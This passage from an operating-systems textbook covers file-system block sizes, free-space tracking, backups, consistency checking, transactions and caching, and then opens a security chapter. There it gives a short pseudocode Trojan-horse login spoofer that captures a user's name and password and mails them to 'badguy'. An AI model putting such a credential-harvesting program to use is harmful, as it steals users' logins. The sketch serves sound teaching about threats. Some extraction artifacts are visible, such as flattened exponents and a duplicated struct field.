With this trick, UNIX avoids entries that cross block boundaries, simplifying the code.

It supports a cute trick for coalescing free space. To delete an entry, simply increase the
size of the previous entry by the size of the entry being deleted. The deleted entry looks
like part of the padding on the end of the previous entry. Since all searches of the
directory are done sequentially, starting at the beginning, the deleted entry will
effectively ``disappear.'' There's only one problem with this trick: It can't be used to
delete the first entry in the directory. Fortunately, the first entry is the `.' entry, which is
never deleted.
To create a new entry, search the directory for an entry that has enough padding
(according to its reclen and namelen fields) to hold the new entry and split it into two
entries by decreasing its reclen field. If no entry with enough padding is found, extend the
directory file by one block, make the whole block into one entry, and try again.
This approach has two very minor additional benefits over the old scheme. In the old scheme,
every entry is 16 bytes, even if the name is only one byte long. In the new scheme, a name uses
only as much space as it needs (although this doesn't save much, since the minimum size of an
entry in the new scheme is 9 bytes--12 if padding is used to align entries to integer boundaries).
The new approach also allows nulls to appear in file names, but other parts of the system make
that impractical, and besides, who cares?
112
Block Size and Extents
All of the file organizations we've mentioned store the contents of a file in a set of disk blocks.
How big should a block be? The problem with small blocks is I/O overhead. There is a certain
overhead to read or write a block beyond the time to actually transfer the bytes. If we double the
block size, a typical file will have half as many blocks. Reading or writing the whole file will
transfer the same amount of data, but it will involve half as many disk I/O operations. The
overhead for an I/O operations includes a variable amount of latency (seek time and rotational
delay) that depends on how close the blocks are to each other, as well as a fixed overhead to start
each operation and respond to the interrupt when it completes.
Many years ago, researchers at the University of California at Berkeley studied the original
UNIX file system. They found that when they tried reading or writing a single very large file
sequentially, they were getting only about 2% of the potential speed of the disk. In other words,
it took about 50 times as long to read the whole file as it would if they simply read that many
sequential blocks directly from the raw disk (with no file system software). They tried doubling
the block size (from 512 bytes to 1K) and the performance more than doubled! The reason the
speed more than doubled was that it took less than half as many I/O operations to read the file.
Because the blocks were twice as large, twice as much of the file's data was in blocks pointed to
directly by the inode. Indirect blocks were twice as large as well, so they could hold twice as
many pointers. Thus four times as much data could be accessed through the singly indirect block
without resorting to the doubly indirect block.
If doubling the block size more than doubled performance, why stop there? Why didn't the
Berkeley folks make the blocks even bigger? The problem with big blocks is internal
fragmentation. A file can only grow in increments of whole blocks. If the sizes of files are
random, we would expect on the average that half of the last block of a file is wasted. If most
files are many blocks long, the relative amount of waste is small, but if the block size is large
compared to the size of a typical file, half a block per file is significant. In fact, if files are very
small (compared to the block size), the problem is even worse. If, for example, we choose a
block size of 8k and the average file is only 1K bytes long, we would be wasting about 7/8 of the
disk.
Most files in a typical UNIX system are very small. The Berkeley researchers made a list of the
sizes of all files on a typical disk and did some calculations of how much space would be wasted
113
by various block sizes. Simply rounding the size of each file up to a multiple of 512 bytes
resulted in wasting 4.2% of the space. Including overhead for inodes and indirect blocks, the
original 512-byte file system had a total space overhead of 6.9%. Changing to 1K blocks raised
the overhead to 11.8%. With 2k blocks, the overhead would be 22.4% and with 4k blocks it
would be 45.6%. Would 4k blocks be worthwhile? The answer depends on economics. In those
days disks were very expensive, and a wasting half the disk seemed extreme. These days, disks
are cheap, and for many applications people would be happy to pay twice as much per byte of
disk space to get a disk that was twice as fast.
But there's more to the story. The Berkeley researchers came up with the idea of breaking up the
disk into blocks and fragments. For example, they might use a block size of 2k and a fragment
size of 512 bytes. Each file is stored in some number of whole blocks plus 0 to 3 fragments at the
end. The fragments at the end of one file can share a block with fragments of other files. The
problem is that when we want to append to a file, there may not be any space left in the block
that holds its last fragment. In that case, the Berkeley file system copies the fragments to a new
(empty) block. A file that grows a little at a time may require each of its fragments to be copied
many times. They got around this problem by modifying application programs to buffer their
data internally and add it to a file a whole block's worth at a time. In fact, most programs already
used library routines to buffer their output (to cut down on the number of system calls), so all
they had to do was to modify those library routines to use a larger buffer size. This approach has
been adopted by many modern variants of UNIX. The Solaris system you are using for this
course uses 8k blocks and 1K fragments.
As disks get cheaper and CPU's get faster, wasted space is less of a problem and the speed
mismatch between the CPU and the disk gets worse. Thus the trend is towards larger and larger
disk blocks.
At first glance it would appear that the OS designer has no say in how big a block is. Any
particular disk drive has a sector size, usually 512 bytes, wired in. But it is possible to use larger
``blocks''. For example, if we think it would be a good idea to use 2K blocks, we can group
together each run of four consecutive sectors and call it a block. In fact, it would even be
possible to use variable-sized ``blocks,'' so long as each one is a multiple of the sector size. A
variable-sized ``block'' is called an extent. When extents are used, they are usually used in
addition to multi-sector blocks. For example, a system may use 2k blocks, each consisting of 4
consecutive sectors, and then group them into extents of 1 to 10 blocks. When a file is opened for
114
writing, it grows by adding an extent at a time. When it is closed, the unused blocks at the end of
the last extent are returned to the system. The problem with extents is that they introduce all the
problems of external fragmentation that we saw in the context of main memory allocation.
Extents are generally only used in systems such as databases, where high-speed access to very
large files is important.
Free Space
We have seen how to keep track of the blocks in each file. How do we keep track of the free
blocks--blocks that are not in any file? There are two basic approaches.

Use a bit vector. That is simply an array of bits with one bit for each block on the disk. A
1 bit indicates that the corresponding block is allocated (in some file) and a 0 bit says that
it is free. To allocate a block, search the bit vector for a zero bit, and set it to one.

Use a free list. The simplest approach is simply to link together the free blocks by storing
the block number of each free block in the previous free block. The problem with this
approach is that when a block on the free list is allocated, you have to read it into
memory to get the block number of the next block in the list. This problem can be solved
by storing the block numbers of additional free blocks in each block on the list. In other
words, the free blocks are stored in a sort of lopsided tree on disk. If, for example, 128
block numbers fit in a block, 1/128 of the free blocks would be linked into a list. Each
block on the list would contain a pointer to the next block on the list, as well as pointers
to 127 additional free blocks. When the first block of the list is allocated to a file, it has to
be read into memory to get the block numbers stored in it, but then we and allocate 127
more blocks without reading any of them from disk. Freeing blocks is done by running
this algorithm in reverse: Keep a cache of 127 block numbers in memory. When a block
is freed, add its block number to this cache. If the cache is full when a block is freed, use
the block being freed to hold all the block numbers in the cache and link it to the head of
the free list by adding to it the block number of the previous head of the list.
How do these methods compare? Neither requires significant space overhead on disk. The
bitmap approach needs one bit for each block. Even for a tiny block size of 512 bytes, each bit of
the bitmap describes 512*8 = 4096 bits of free space, so the overhead is less than 1/40 of 1%.
The free list is even better. All the pointers are stored in blocks that are free anyhow, so there is
no space overhead (except for one pointer to the head of the list). Another way of looking at this
115
is that when the disk is full (which is the only time we should be worried about space overhead!)
the free list is empty, so it takes up no space. The real advantage of bitmaps over free lists is that
they give the space allocator more control over which block is allocated to which file. Since the
blocks of a file are generally accessed together, we would like them to be near each other on
disk. To ensure this clustering, when we add a block to a file we would like to choose a free
block that is near the other blocks of a file. With a bitmap, we can search the bitmap for an
appropriate block. With a free list, we would have to search the free list on disk, which is clearly
impractical. Of course, to search the bitmap, we have to have it all in memory, but since the
bitmap is so tiny relative to the size of the disk, it is not unreasonable to keep the entire bitmap in
memory all the time. To do the comparable operation with a free list, we would need to keep the
block numbers of all free blocks in memory. If a block number is four bytes (32 bits), that means
that 32 times as much memory would be needed for the free list as for a bitmap. For a concrete
example, consider a 2 gigabyte disk with 8K blocks and 4-byte block numbers. The disk contains
231/213 = 218 = 262,144 blocks. If they are all free, the free list has 262,144 entries, so it would
take one megabyte of memory to keep them all in memory at once. By contrast, a bitmap
requires 218 bits, or 215 = 32K bytes (just four blocks). (On the other hand, the bit map takes the
same amount of memory regardless of the number of blocks that are free).
Reliability
Disks fail, disks sectors get corrupted, and systems crash, losing the contents of volatile memory.
There are several techniques that can be used to mitigate the effects of these failures. We only
have room for a brief survey.
Bad-block Forwarding
When the disk drive writes a block of data, it also writes a checksum, a small number of
additional bits whose value is some function of the ``user data'' in the block. When the block is
read back in, the checksum is also read and compared with the data. If either the data or
checksum were corrupted, it is extremely unlikely that the checksum comparison will succeed.
Thus the disk drive itself has a way of discovering bad blocks with extremely high probability.
The hardware is also responsible for recovering from bad blocks. Modern disk drives do
automatic bad-block forwarding. The disk drive or controller is responsible for mapping block
numbers to absolute locations on the disk (cylinder, track, and sector). It holds a little bit of space
in reserve, not mapping any block numbers to this space. When a bad block is discovered, the
116
disk allocates one of these reserved blocks and maps the block number of the bad block to the
replacement block. All references to this block number access the replacement block instead of
the bad block. There are two problems with this scheme. First, when a block goes bad, the data in
it is lost. In practice, blocks tend to be bad from the beginning, because of small defects in the
surface coating of the disk platters. There is usually a stand-alone formatting program that tests
all the blocks on the disk and sets up forwarding entries for those that fail. Thus the bad blocks
never get used in the first place. The main reason for the forwarding is that it is just too hard
(expensive) to create a disk with no defects. It is much more economical to manufacture a
``pretty good'' disk and then use bad-block forwarding to work around the few bad blocks. The
other problem is that forwarding interferes with the OS's attempts to lay out files optimally. The
OS may think it is doing a good job by assigning consecutive blocks of a file to consecutive
block numbers, but if one of those blocks is forwarded, it may be very far away for the others. In
practice, this is not much of a problem since a disk typically has only a handful of forwarded
sectors out of millions.
The software can also help avoid bad blocks by simply leaving them out of the free list (or
marking them as allocated in the allocation bitmap).
Back-up Dumps
There are a variety of storage media that are much cheaper than (hard) disks but are also much
slower. An example is 8 millimeter video tape. A ``two-hour'' tape costs just a few dollars and
can hold two gigabytes of data. By contrast, a 2GB hard drive currently casts several hundred
dollars. On the other hand, while worst-case access time to a hard drive is a few tens of
milliseconds, rewinding or fast-forwarding a tape to desired location can take several minutes.
One way to use tapes is to make periodic back up dumps. Dumps are really used for two
different purposes:

To recover lost files. Files can be lost or damaged by hardware failures, but far more
often they are lost through software bugs or human error (accidentally deleting the wrong
file). If the file is saved on tape, it can be restored.

To recover from catastrophic failures. An entire disk drive can fail, or the whole
computer can be stolen, or the building can burn down. If the contents of the disk have
been saved to tape, the data can be restored (to a repaired or replacement disk). All that is
lost is the work that was done since the information was dumped.
117
Corresponding to these two ways of using dumps, there are two ways of doing dumps. A
physical dump simply copies all of the blocks of the disk, in order, to tape. It's very fast, both for
doing the dump and for recovering a whole disk, but it makes it extremely slow to recover any
one file. The blocks of the file are likely to be scattered all over the tape, and while seeks on disk
can take tens of milliseconds, seeks on tape can take tens or hundreds of seconds. The other
approach is a logical dump, which copies each file sequentially. A logical dump makes it easy to
restore individual files. It is even easier to restore files if the directories are dumped separately at
the beginning of the tape, or if the name(s) of each file are written to the tape along with the file.
The problem with logical dumping is that it is very slow. Dumps are usually done much more
frequently than restores. For example, you might dump your disk every night for three years
before something goes wrong and you need to do a restore. An important trick that can be used
with logical dumps is to only dump files that have changed recently. An incremental dump saves
only those files that have been modified since a particular date and time. Fortunately, most file
systems record the time each file was last modified. If you do a backup each night, you can save
only those files that have changed since the last backup. Every once in a while (say once a
month), you can do a full backup of all files. In UNIX jargon, a full backup is called an epoch
(pronounced ``eepock'') dump, because it dumps everything that has changed since ``the epoch''-January 1, 1970, which is the earliest possible date in UNIX.
The Computer Sciences department currently does backup dumps on about 260 GB of disk
space. Epoch dumps are done once every 14 days, with the timing on different file systems
staggered so that about 1/14 of the data is dumped each night. Daily incremental dumps save
about 6-10% of the data on each file system.
Incremental dumps go fast because they dump only a small fraction of the files, and they don't
take up a lot of tape. However, they introduce new problems:

If you want to restore a particular file, you need to know when it was last modified so
that you know which dump tape to look at.

If you want to restore the whole disk (to recover from a catastrophic failure), you have to
restore from the last epoch dump, and then from every incremental dump since then, in
order. A file that is modified every day will appear on every tape. Each restore will
overwrite the file with a newer version. When you're done, everything will be up-to-date
as of the last dump, but the whole process can be extremely slow (and labor-intensive).
118

You have to keep around all the incremental tapes since the last epoch. Tapes are cheap,
but they're not free, and storing them can be a hassle.
The First problem can be solved by keeping a directory of what was dumped when. A bunch of
UW alumni (the same guys that invented NFS) have made themselves millionaires by marketing
software to do this. The other problems can be solved by a clever trick. Each dump is assigned a
positive integer level. A level n dump is an incremental dump that dumps all files that have
changed since the most recent previous dump with a level greater than or equal to n. An epoch
dump is considered to have infinitely high level. Levels are assigned to dumps as follows:
This scheme is sometimes called a ruler schedule for obvious reasons. Level-1 dumps only save
files that have changed in the previous day. Level-2 dumps save files that have changed in the
last two days, level-3 dumps cover four days, level-4 dumps cover 8 days, etc. Higher-level
dumps will thus include more files (so they will take longer to do), but they are done
infrequently. The nice thing about this scheme is that you only need to save one tape from each
level, and the number of levels is the logarithm of the interval between epoch dumps. Thus, even
if did a dump each night and you only did an epoch dump only once a year, you would need only
nine levels (hence nine tapes). That also means that a full restore needs at worst one restore from
each of nine tapes (rather than 365 tapes!). To figure out what tapes you need to restore from if
your disk is destroyed after dump number n, express n in binary, and number the bits from right
to left, starting with 1. The 1 bits tell you which dump tapes to use. Restore them in order of
decreasing level. For example, 20 in binary is 10100, so if the disk is destroyed after the 20th
dump, you only need to restore from the epoch dump and from the most recent dumps at levels 5
and 3.
Consistency Checking
Some of the information in a file system is redundant. For example, the free list could be
reconstructed by checking which blocks are not in any file. Redundancy arises because the same
information is represented in different forms to make different operations faster. If you want to
119
know which blocks are in a given file, look at the inode. If you you want to know which blocks
are not in any inode, use the free list. Unfortunately, various hardware and software errors can
cause the data to become inconsistent. File systems often include a utility that checks for
consistency and optionally attempts to repair inconsistencies. These programs are particularly
handy for cleaning up the disks after a crash.
UNIX has a utility called fscheck. It has two principal tasks. First, it checks that blocks are
properly allocated. Each inode is supposed to be the root of a tree of blocks, the free list is
supposed to be a tree of blocks, and each block is supposed to appear in exactly one of these
trees. Fscheck runs through all the inodes, checking each allocated inode for reasonable values,
and walking through the tree of blocks rooted at the inode. It maintains a bit vector to record
which blocks have been encountered. If block is encountered that has already been seen, there is
a problem: Either it occurred twice in the same file (in which case it isn't a tree), or it occurred in
two different files. A reasonable recovery would be to allocate a new block, copy the contents of
the problem block into it, and substitute the copy for the problem block in one of the two places
where it occurs. It would also be a good idea to log an error message so that a human being can
check up later to see what's wrong. After all the files are scanned, any block that hasn't been
found should be on the free list. It would be possible to scan the free list in a similar manner, but
it's probably easier just to rebuild the free list from the set of blocks that were not found in any
file. If a bitmap instead of a free list is used, this step is even easier: Simply overwrite the file
system's bitmap with the bitmap constructed during the scan.
The other main consistency requirement concerns the directory structure. The set of directories is
supposed to be a tree, and each inode is supposed to have a link count that indicates how many
times it appears in directories. The tree structure could be checked by a recursive walk through
the directories, but it is more efficient to combine this check with the walk through the inodes
that checks for disk blocks, but recording, for each directory inode encountered, the inumber of
its parent. The set of directories is a tree if and only if and only if every directory other than the
root has a unique parent. This pass can also rebuild the link count for each inode by maintaining
in memory an array with one slot for each inumber. Each time the inumber is found in a
directory, increment the corresponding element of the array. The resulting counts should match
the link counts in the inodes. If not, correct the counts in the inodes.
This illustrates a very important principal that pops up throughout operating system
implementation (indeed, throughout any large software system): the doctrine of hints and
120
absolutes. Whenever the same fact is recorded in two different ways, one of them should be
considered the absolute truth, and the other should be considered a hint. Hints are handy because
they allow some operations to be done much more quickly that they could if only the absolute
information was available. But if the hint and the absolute do not agree, the hint can be rebuilt
from the absolutes. In a well-engineered system, there should be some way to verify a hint
whenever it is used. UNIX is a bit lax about this. The link count is a hint (the absolute
information is a count of the number of times the inumber appears in directories), but UNIX
treats it like an absolute during normal operation. As a result, a small error can snowball into
completely trashing the file system.
For another example of hints, each allocated block could have a header containing the inumber
of the file containing it and its offset in the file. There are systems that do this (UNIX isn't one of
them). The tree of blocks rooted at an inode then becomes a hint, providing an efficient way of
finding a block, but when the block is found, its header could be checked. Any inconsistency
would then be caught immediately, and the inode structures could be rebuilt from the
information in the block headers.
By the way, if the link count calculated by the scan is zero (i.e., the inode, although marked as
allocated, does not appear in any directory), it would not be prudent to delete the file. A better
recovery is to add an entry to a special lost+found directory pointing to the orphan inode, in case
it contains something really valuable.
Transactions
The previous section talks about how to recover from situations that ``can't happen.'' How do
these problems arise in the first place? Wouldn't it be better to prevent these problems rather than
recover from them after the fact? Many of these problems arise, particularly after a crash,
because some operation was ``half-completed.'' For example, suppose the system was in the
middle of executing a unlink system call when the lights went out. An unlink operation involves
several distinct steps:

remove an entry from a directory,

decrement a link count, and if the count goes to zero,

move all the blocks of the file to the free list, and

free the inode.
121
If the crash occurs between the first and second steps, the link count will be wrong. If it occurs
during the third step, a block may be linked both into the file and the free list, or neither,
depending on the details of how the code is written. And so on...
To deal with this kind of problem in a general way, transactions were invented. Transactions
were first developed in the context of database management systems, and are used heavily there,
so there is a tradition of thinking of them as ``database stuff'' and teaching about them only in
database courses and text books. But they really are an operating system concept. Here's a twobit introduction.
We have already seen a mechanism for making complex operations appear atomic. It is called a
critical section. Critical sections have a property that is sometimes called synchronization
atomicity. It is also called serializability because if two processes try to execute their critical
sections at about the same time, the next effect will be as if they occurred in some serial order. If
systems can crash (and they can!), synchronization atomicity isn't enough. We need another
property, called failure atomicity, which means an ``all or nothing'' property: Either all of the
modifications of nonvolatile storage complete or none of them do.
There are basically two ways to implement failure atomicity. They both depend on the fact that a
writing a single block to disk is an atomic operation. The first approach is called logging. An
append-only file called a log is maintained on disk. Each time a transaction does something to
file-system data, it creates a log record describing the operation and appends it to the log. The
log record contains enough information to undo the operation. For example, if the operation
made a change to a disk block, the log record might contain the block number, the length and
offset of the modified part of the block, and the the original content of that region. The
transaction also writes a begin record when it starts, and a commit record when it is done. After a
crash, a recovery process scans the log looking for transactions that started (wrote a begin
record) but never finished (wrote a commit record). If such a transaction is found, its partially
completed operations are undone (in reverse order) using the undo information in the log
records.
Sometimes, for efficiency, disk data is cached in memory. Modifications are made to the cached
copy and only written back out to disk from time to time. If the system crashes before the
changes are written to disk, the data structures on disk may be inconsistent. Logging can also be
used to avoid this problem by putting into each log record redo information as well as undo
122
information. For example, the log record for a modification of a disk block should contain both
the old and new value. After a crash, if the recovery process discovers a transaction that has
completed, it uses the redo information to make sure the effects of all of its operations are
reflected on disk. Full recovery is always possible provided

The log records are written to disk in order,

The commit record is written to disk when the transaction completes, and

The log record describing a modification is written to disk before any of the changes
made by that operation are written to disk.
This algorithm is called write-ahead logging.
The other way of implementing transactions is called shadow blocks. Suppose the data structure
on disk is a tree. The basic idea is never to change any block (disk block) of the data structure in
place. Whenever you want to modify a block, make a copy of it (called a shadow of it) instead,
and modify the parent to point to the shadow. Of course, to make the parent point to the shadow
you have to modify it, so instead you make a shadow of the parent an modify it instead. In this
way, you shadow not only each block you really wanted to modify, but also all the blocks on the
path from it to the root. You keep the shadow of the root block in memory. At the end of the
transaction, you make sure the shadow blocks are all safely written to disk and then write the
shadow of the root directly onto the root block. If the system crashes before you overwrite the
root block, there will be no permanent change to the tree on disk. Overwriting the root block has
the effect of linking all the modified (shadow blocks) into the tree and removing all the old
blocks. Crash recovery is simply a matter of garbage collection. If the crash occurs before the
root was overwritten, all the shadow blocks are garbage. If it occurs after, the blocks they
replaced are garbage. In either case, the tree itself is consistent, and it is easy to find the garbage
blocks (they are blocks that aren't in the tree).
Database systems almost universally use logging, and shadowing is mentioned only in passing in
database texts. But the shadowing technique is used in a variant of the UNIX file system called
(somewhat misleadingly) the Log-structured File System (LFS). The entire file system is made
into a tree by replacing the array of inodes with a tree of inodes. LFS has the added advantage
(beyond reliability) that all blocks are written sequentially, so write operations are very fast. It
has the disadvantage that files that are modified here and there by random access tend to have
their blocks scattered about, but that pattern of access is comparatively rare, and there are
123
techniques to cope with it when it occurs. The main source of complexity in LFS is figuring out
when and how to do the ``garbage collection.''
Performance
The main trick to improve file system performance (like anything else in computer science) is
caching. The system keeps a disk cache (sometimes also called a buffer pool) of recently used
disk blocks. In contrast with the page frames of virtual memory, where there were all sorts of
algorithms proposed for managing the cache, management of the disk cache is pretty simple. On
the whole, it is simply managed LRU (least recently used). Why is it that for paging we went to
great lengths trying to come up with an algorithm that is ``almost as good as LRU'' while here we
can simply use true LRU? The problem with implementing LRU is that some information has to
be updated on every single reference. In the case of paging, references can be as frequent as
every instruction, so we have to make do with whatever information hardware is willing to give
us. The best we can hope for is that the paging hardware will set a bit in a page-table entry. In the
case of file system disk blocks, however, each reference is the result of a system call, and adding
a few extra instructions added to a system call for cache maintenance is not unreasonable.
Adding page caching to the file system implementation is actually quite simple. Somewhere in
the implementation, there is probably a procedure that gets called when the system wants to
access a disk block. Let's suppose the procedure simply allocates some memory space to hold the
block and reads it into memory.
Block readBlock(int blockNumber) {
Block result = new Block();
Disk.read(blockNumber, result);
return result;
}
To add caching, all we have to do is modify this code to search the disk cache first.
class CacheEntry {
int blockNumber;
Block buffer;
CacheEntry next, previous;
}
class DiskCache {
CacheEntry head, tail;
CacheEntry find(int blockNumber) {
// Search the list for an entry with a matching block number.
// If not found, return null.
}
void moveToFront(CacheEntry entry) {
// more entry to the head of the list
}
124
CacheEntry oldest() {
return tail;
}
Block readBlock(int blockNumber) {
Block result;
CacheEntry entry = find(blockNumber);
if (entry == null) {
entry = oldest();
Disk.read(blockNumber, entry.buffer);
entry.blockNumber = blockNumber;
}
moveToFront(entry);
return entry.buffer;
}
}
This code is not quite right, because it ignores writes. If the oldest buffer is dirty (it has been
modified since it was read from disk), it first has to be written back to the disk before it can be
used to hold the new block. Most systems actually write dirty buffers back to the disk sooner
than necessary to minimize the damage caused by a crash. The original version of UNIX had a
background process that would write all dirty buffers to disk every 30 seconds. Some
information is more critical than others. Some versions of UNIX, for example, write back
directory blocks (the data block of directory files of type directory) as each time they are
modified. This technique--keeping the block in the cache but writing its contents back to disk
after any modification--is called write-through caching. (Some modern versions of UNIX use
techniques inspired by database transactions to minimize the effects of crashes).
LRU management automatically does the ``right thing'' for most disk blocks. If someone is
actively manipulating the files in a directory, all of the directory's blocks will probably be in the
cache. If a process is scanning a large file, all of its indirect blocks will probably be in memory
most of the time. But there is one important case where LRU is not the right policy. Consider a
process that is traversing (reading or writing) a file sequentially from beginning to end. Once that
process has read or written the last byte of a block, it will not touch that block again. The system
might as well immediately move the block to the tail of the list as soon as the read or write
request completes. Tanenbaum calls this technique free behind. It is also sometimes called most
recently used (MRU) to contrast it with LRU. How does the system know to handle certain
blocks MRU? There are several possibilities.

If the operating system interface distinguishes between random-access files and
sequential files, it is easy. Data blocks of sequential files should be managed MRU.
125

In some systems, all files are alike, but there is a different kind of open call, or a flag
passed to open, that indicates whether the file will be accessed randomly or sequentially.

Even if the OS gets no explicit information from the application program, it can watch
the pattern of reads an writes. If recent history indicates that all (or most) reads or writes
of the file have been sequential, the data blocks should be managed MRU.
A similar trick is called read-ahead. If a file is being read sequentially, it is a good idea to read a
few blocks at a time. This cuts down on the latency for the application (most of the time the data
the application wants is in memory before it even asks for it). If the disk hardware allows
multiple blocks to be read at a time, it can cut the number of disk read requests, cutting down on
overhead such as the time to service a I/O completion interrupt. If the system has done a good
job of clustering together the disks of the file, read-ahead also takes better advantage of the
clustering. If the system reads one block at a time, another process, accessing a different file,
could make the disk head move away from the area containing the blocks of this file between
accesses.
The Berkeley file system introduced another trick to improve file system performance. They
divided the disk into chunks, which they called cylinder groups (CGs) because each one is
comprised of some number of adjacent cylinders. Each CG is like a miniature disk. It has its own
super block and array of inodes. The system attempts to put all the blocks of a file in the same
CG as its inode. It also tries to keep all the inodes in one directory together in the same CG so
that operations like
ls -l *
will be fast. It uses a variety to techniques to assign inodes and blocks to CGs in such as way as
to distribute the free space fairly evenly between them, so there will be enough room to do this
clustering. In particular,

When a new file is created, its inode is placed in the same CG as its parent directory (if
possible). But when a new directory is created, its inode is placed in CG with the largest
amount of free space (so that the files in the directory will be able to be near each other).

When blocks are added to a file, they are allocated (if possible) from the same CG that
contains it inode. But when the size of the file crosses certain thresholds (say every
megabyte or so), the system switches to a different CG, one that is relatively empty. The
126
idea is to prevent a big file from hogging all the space in one CG and preventing other
files in the CG from being well clustered.
This Java declaration is actually a bit of a lie. In Java, an instance of class Dirent would include
some header information indicating that it was a Dirent object, a two-byte short integer, and a
pointer to an array object (which contains information about its type an length, in addition to the
14 bytes of data). The actual representation is given by the C (or C++) declaration
struct direct {
unsigned short int inumber;
char name[14];
}
Unfortunately, there's no way to represent this in Java.
This is also a lie for the fact that the field byte name[], which is intended to indicate an array of
indeterminant length, rather than a pointer to an array. The actual C declaration is
struct dirent {
unsigned long int inumber;
unsigned short int reclen;
unsigned short int reclen;
char name[256];
}
The array size 256 is a lie. The code depends on the fact that the C language does not do any
array bounds checking. Dictionary defines epoch as an instant of time or a date selected as a
point of reference in astronomy.
Critical sections are usually implemented so that they actually occur one after the other, but all
that is required is that they behave as if they were serialized. For example, if neither transaction
modifies anything, or if they don't touch any overlapping data, they can be run concurrently
without any harm. Database implementations of transactions go to a great deal of trouble to
allow as much concurrency as possible.
7.6 Exercises
1. Researchers have suggested that, instead of having an access list associated with each file
(specifying which users can access the file, and how), we should have a user control list
associated with each user (specifying which files a user can access, and how). Discuss the
relative merits of these two schemes.
Answer:
127
File control list. Since the access control information is concentrated in one single place, it is
easier to change access control information and this requires less space.
User control list. This requires less overhead when opening a file.
2. Consider a file currently consisting of 100 blocks. Assume that the file control block (and the
index block, in the case of indexed allocation) is already in memory. Calculate how many
disk I/O operations are required for contiguous, linked, and indexed (single-level) allocation
strategies, if, for one block, the following conditions hold. In the contiguous-allocation case,
assume that there is no room to grow in the beginning, but there is room to grow in the end.
Assume that the block information to be added is stored in memory.
(a) The block is added at the beginning.
(d)The
block
is
removed
from
the
beginning.
(b) The block is added in the middle.
(e) The block is removed from the middle.
(c) The block is added at the end.
(f) The block is removed from the end.
Answer:
Contiguous Linked Indexed
(a) 201 1 1
(b) 101 52 1
(c) 1 3 1
(d) 198 1 0
(e) 98 52 0
(f) 0 100 0
3. What problems could occur if a system allowed a file system to be mounted simultaneously
at more than one location?
Answer:
There would be multiple paths to the same file, which could confuse users or encourage
mistakes (deleting a file with one path deletes the file in all the other paths).
4. Why must the bitmap for file allocation be kept on mass storage, rather than in main
memory?
Answer:
In case of system crash (memory failure) the free-space list would not be lost as it would be
if the bit map had been stored in main memory.
5. Consider a system that supports the strategies of contiguous, linked, and indexed allocation.
What criteria should be used in deciding which strategy is best utilized for a particular file?
Answer:
128
• Contiguous - If file is usually accessed sequentially, if file is relatively small.
• Linked - if file is large and usually accessed sequentially.
• Indexed - if file is large and usually accessed randomly
129
130
8. Protection and Security
The terms protection and security are often used together, and the distinction between them is a
bit blurred, but security is generally used in a broad sense to refer to all concerns about
controlled access to facilities, while protection describes specific technological mechanisms that
support security.
8.1 User Security
As in any other area of software design, it is important to distinguish between policies and
mechanisms. Before you can start building machinery to enforce policies, you need to establish
what policies you are trying to enforce. Many years ago, there was a story about a software firm
that was hired by a small savings and loan corporation to build a financial accounting system.
The chief financial officer used the system to embezzle millions of dollars and fled the country.
The losses were so great the S&L went bankrupt, and the loss of the contract was so bad the
software company also went belly-up. Did the accounting system have a good or bad security
design? The problem wasn't unauthorized access to information, but rather authorization to the
wrong person. The situation is analogous to the old saw that every program is correct according
to some specification. Unfortunately, we don't have the space here to go into the whole question
of security policies here. We will just assume that terms like ``authorized access'' have some
well-defined meaning in a particular context.
Threats
Any discussion of security must begin with a discussion of threats. After all, if you don't know
what you're afraid of, how are you going to defend against it? Threats are generally divided in
three main categories.

Unauthorized disclosure. A ``bad guy'' gets to see information he has no right to see
(according to some policy that defines ``bad guy'' and ``right to see'').

Unauthorized updates. The bad guy makes changes he has no right to change.

Denial of service. The bad guy interferes with legitimate access by other users.
There is a wide spectrum of denial-of-service threats. At one end, it overlaps with the previous
category. A bad guy deleting a good guy's file could be considered an unauthorized update. A the
other end of the spectrum, blowing up a computer with a hand grenade is not usually considered
an unauthorized update. As this second example illustrates, some denial-of-service threats can
131
only be enforced by physical security. No matter how well your OS is designed, it can't protect
my files from his hand grenade. Another form of denial-of-service threat comes from
unauthorized consumption of resources, such as filling up the disk, tying up the CPU with an
infinite loop, or crashing the system by triggering some bug in the OS. While there are software
defenses against these threats, they are generally considered in the context of other parts of the
OS rather than security and protection. In short, discussion of software mechanisms for computer
security generally focuses on the first two threats.
In response to these threats counter measures also fall into various categories. As programmers,
we tend to think of technological tricks, but it is also important to realize that a complete security
design must involve physical components (such as locking the computer in a secure building
with armed guards outside) and human components (such as a background check to make sure
your CFO isn't a crook, or checking to make sure those armed guards aren't taking bribes).
The Trojan Horse
Break-in techniques come in numerous forms. One general category of attack that comes in a
great variety of disguises is the Trojan Horse scam. The name comes from Greek mythology.
The ancient Greeks were attacking the city of Troy, which was surrounded by an impenetrable
wall. Unable to get in, they left a huge wooden horse outside the gates as a ``gift'' and pretended
to sail away. The Trojans brought the horse into the city, where they discovered that the horse
was filled with Greek soldiers who defeated the Trojans to win the Rose Bowl (oops, wrong
story). In software, a Trojan Horse is a program that does something useful--or at least appears to
do something useful--but also subverts security somehow. In the personal computer world,
Trojan horses are often computer games infected with ``viruses.''
Here's the simplest Trojan Horse program that log onto a public terminal and start a program that
does something like this:
print("login:");
name = readALine();
turnOffEchoing();
print("password:");
passwd = readALine();
sendMail("badguy",name,passwd);
print("login incorrect");
exit();
A user waking up to the terminal will think it is idle. He will attempt to log in, typing his login
name and password. The Trojan Horse program sends this information to the bad guy, prints the
132
message login incorrect and exits. After the program exits, the system will generate a legitimate
login: message and the user, thinking he mistyped his password (a common occurrence because
the password is not echoed) will try again, log in successfully, and have no suspicion that
anything was wrong. Note that the Trojan Horse program doesn't actually have to do anything
useful, it just has to appear to.
Design Principles

Public Design. A common mistake is to try to keep a system secure by keeping its
algorithms secret. That's a bad idea for many reasons. First, it gives a kind of all-ornothing security. As soon as anybody learns about the algorithm, security is all gone. In
the words of Benjamin Franklin, ``Two people can keep a secret if one of them is dead.''
Second, it is usually not that hard to figure out the algorithm, by seeing how the system
responds to various inputs, decompiling the code, etc. Third, publishing the algorithm can
have beneficial effects. The bad guys probably have already figured out your algorithm
and found its weak points. If you publish it, perhaps some good guys will notice bugs or
loopholes and tell you about them so you can fix them.

Default is No Access. Start out by granting as little access possible and adding privileges
only as needed. If you forget to grant access where it is legitimately needed, you'll soon
find out about it. Users seldom complain about having too much access.

Timely Checks. Checks tend to ``wear out.'' For example, the longer you use the same
password, the higher the likelihood it will be stolen or deciphered. Be careful: This
principle can be overdone. Systems that force users to change passwords frequently
encourage them to use particularly bad ones. A system that forced users to supply a
